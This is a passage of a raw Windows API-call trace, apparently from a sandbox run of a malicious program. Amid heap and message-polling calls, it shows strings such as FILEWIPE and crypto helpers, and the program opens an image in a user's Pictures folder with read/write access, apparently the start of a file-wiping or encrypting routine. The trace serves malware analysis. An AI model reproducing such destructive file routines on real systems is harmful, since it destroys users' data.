[0190.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.034] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.034] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0190.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.034] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.035] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.035] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.035] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.035] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.035] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.035] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.035] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0190.035] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0190.036] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.036] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.036] FreeLibrary (hLibModule=0x74f20000) returned 1 [0190.036] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.036] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.036] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.036] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0190.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0190.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.037] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0190.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0190.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0190.039] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0190.039] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0190.039] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0190.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0190.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0190.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.039] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0190.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0190.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0190.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.039] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x525098e0, ftCreationTime.dwHighDateTime=0x1d5dd7a, ftLastAccessTime.dwLowDateTime=0xf1e50b30, ftLastAccessTime.dwHighDateTime=0x1d5df13, ftLastWriteTime.dwLowDateTime=0xf1e50b30, ftLastWriteTime.dwHighDateTime=0x1d5df13, nFileSizeHigh=0x0, nFileSizeLow=0x176ff, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="QS5wBgJkU5.bmp", cAlternateFileName="QS5WBG~1.BMP")) returned 0x90ae18 [0190.040] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0190.040] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0190.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0190.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0190.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0190.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0190.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0190.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0190.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0190.040] CharLowerBuffW (in: lpsz="byte[95999]", cchLength=0xb | out: lpsz="byte[95999]") returned 0xb [0190.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0190.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0190.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0190.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0190.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0190.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0190.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0190.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0190.041] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0190.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0190.041] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0190.041] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0190.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0190.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0190.042] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0190.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0190.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.042] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0190.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0190.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0190.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x8e1a00 [0190.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x8e1a00, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0190.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0190.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0190.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.042] FreeLibrary (hLibModule=0x75c90000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0190.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0190.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.044] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.044] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.044] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.044] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0190.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0190.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0190.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.045] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0190.045] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\qs5wbgjku5.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0190.045] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 